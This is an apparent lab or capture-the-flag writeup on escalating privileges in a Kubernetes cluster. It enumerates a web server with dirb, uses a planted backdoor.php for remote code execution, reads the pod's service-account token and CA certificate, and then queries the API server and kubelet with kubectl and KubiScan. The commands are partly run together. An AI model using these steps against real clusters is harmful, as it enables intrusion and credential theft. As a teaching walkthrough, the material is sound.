[ Home ] [ Writeups ] [ Articles ] [ Cheatsheets ] [ CVE ] [ EOF ]


.:: [KUBERNETES] Exploitation 2 ::.
Title : [KUBERNETES] Exploitation 2
Author : Cabir  
Date : Friday, Sep 13, 2019
Modified : Friday, Sep 13, 2019
Reading time: 0 minutes and 24 seconds.

-=[Privilege escalation with malicious pod 2]=-

FingerPrint

1dirb http://10.23.58.40:30677/ /usr/share/dirb/wordlists/big.txt dirb http://10.23.58.40:30677/ /usr/share/dirb/wordlists/big.txt -x .php Result --> backdoor.php 

Got an RCE with backdoor.php

1ls /run/secrets/kubernetes.io/serviceaccount 
2cat /run/secrets/kubernetes.io/serviceaccount/token 
3cat /run/secrets/kubernetes.io/serviceaccount/ca.crt 
4cat /run/secrets/kubernetes.io/serviceaccount/namespace OU http://10.23.58.40:30677/backdoor.php?d=/run/secrets/kubernetes.io/serviceaccount/token http://10.23.58.40:30677/backdoor.php?d=/run/secrets/kubernetes.io/serviceaccount/ca.crt http://10.23.58.40:30677/backdoor.php?d=/run/secrets/kubernetes.io/serviceaccount/namespace 

On your computer download kubectl

1curl -LO https://storage.googleapis.com/kubernetes-release/release/$(curl -s https://storage.googleapis.com/kubernetes-release/release/stable.txt)/bin/ linux/amd64/kubectl 

Try to get pods:

1./kubectl --token=cat jwt.token --certificate-authority=ca.crt --server=https://10.23.58.40:6443 get pods Response: Error from server (Forbidden): pods is forbidden: User "system:serviceaccount:mktg:wordpress" cannot list resource "pods" in API group "" in the namespace "default"

Kubi-Scan :

1 python3 KubiScan/KubiScan.py -ho 10.23.58.40:6443 -t jwt.token -c ca.crt -a https://10.23.58.40:6443/version https://10.23.58.40:10250/pods https://10.23.58.40:10250/healthz https://10.23.58.40:10250/logs


[ Home ] [ Writeups ] [ Articles ] [ Cheatsheets ] [ CVE ] [ EOF ]